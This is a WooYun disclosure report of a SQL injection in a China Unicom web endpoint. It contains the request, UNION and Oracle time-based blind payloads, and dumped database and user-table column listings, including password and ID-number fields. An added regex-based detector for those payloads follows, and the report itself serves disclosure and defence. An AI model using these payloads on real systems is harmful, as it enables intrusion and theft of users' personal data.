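Vulnerability summary

Bug ID: wooyun-2015-0158202

Title: SQL injection in a China Unicom site (user information disclosure)

Vendor: China Unicom

Author: 偶然

Submitted: 2015-12-04 22:52

Fixed: 2016-01-21 18:22

Disclosed: 2016-01-21 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]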


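Vulnerability details

Disclosure status:

2015-12-04: Details reported to the vendor; awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and experts in related fields
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to trainee white hats
2016-01-21: Details disclosed to the public

Brief description:

Detailed description: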

POST /CKindMessageControl/createCookies.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/login.jsp
Content-Length: 36
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

checkCode=123456&checkKindCode=admin


Parameter: checkKindCode
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: checkCode=123456&checkKindCode=admin' UNION ALL SELECT CHR(58)||CHR(98)||CHR(105)||CHR(109)||CHR(58)||CHR(67)||CHR(67)||CHR(102)||CHR(114)||CHR(89)||CHR(87)||CHR(109)||CHR(106)||CHR(101)||CHR(66)||CHR(58)||CHR(119)||CHR(101)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON
---
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XXTY
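
For defenders reviewing request logs for this endpoint, the following added example (not part of the original report) flags the Oracle-specific indicators visible in the two payloads above and decodes `CHR(n)||CHR(m)` chains into readable text. The function names and the third, percent-encoded sample body are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Indicators derived from the two payload types in the report (Oracle back end).
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time_delay": re.compile(r"\bDBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I),
    "chr_chain": re.compile(r"(?:CHR\(\d{1,3}\)\s*\|\|\s*){2,}CHR\(\d{1,3}\)", re.I),
    "quote_break": re.compile(r"'\s*(?:AND|OR|UNION)\b", re.I),
}

def decode_chr_chains(value):
    """Return the text built by each CHR(n)||CHR(m)||... run, for analyst review."""
    decoded = []
    for match in INDICATORS["chr_chain"].finditer(value):
        codes = re.findall(r"CHR\((\d+)\)", match.group(0), re.I)
        decoded.append("".join(chr(int(c)) for c in codes))
    return decoded

def inspect_form_body(body):
    """Return one finding per suspicious parameter of a urlencoded POST body."""
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
        if hits:
            findings.append({"param": name, "indicators": hits,
                             "decoded": decode_chr_chains(value)})
    return findings

# Sample bodies: the first two are the ones shown in the report; the third is
# a constructed, shortened and percent-encoded variant of the UNION payload.
SAMPLES = [
    "checkCode=123456&checkKindCode=admin",
    "checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE("
    "CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON",
    "checkCode=123456&checkKindCode=admin%27+UNION+ALL+SELECT+"
    "CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28105%29%2CNULL+FROM+DUAL--",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_form_body(body) or "clean")
```

Pattern matching of this kind is a log-triage aid only; the fix for the endpoint is to bind `checkKindCode` as a query parameter instead of concatenating it into the SQL statement.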

Proof of vulnerability:

Database: XXTY
[267 tables]

Database: XXTY
Table: SYS_USER
[24 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ACCOUNTADDRESS | VARCHAR2 |
| ADDRESS | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CLIENTLOGINDATE | DATE |
| DESCRIPTION | VARCHAR2 |
| ENDONLINEDATE | DATE |
| ETHNIC | VARCHAR2 |
| FIXEDPHONE | VARCHAR2 |
| GENDER | VARCHAR2 |
| IDNUMBER | VARCHAR2 |
| ISREGEASEMOB | NUMBER |
| KINDID | VARCHAR2 |
| LOGINUSER | VARCHAR2 |
| MOBILEPHONE | VARCHAR2 |
| PARTITIONCODE | VARCHAR2 |
| PHOTOHEADURL | VARCHAR2 |
| POSTID | VARCHAR2 |
| PWD | VARCHAR2 |
| RFID | VARCHAR2 |
| ROLEID | NUMBER |
| STATUSFLAG | VARCHAR2 |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
| USERNAMEAUDIO | VARCHAR2 |
+-----------------+----------+

Remediation:

Copyright notice: when reposting, please credit the source 偶然@乌云


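Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-08 13:03

Vendor reply:

CNVD confirmed and reproduced the situation described, and has referred it via CNCERT to China United Network Communications Group Co., Ltd., which will coordinate with the website's management department to handle it.

Latest status:

None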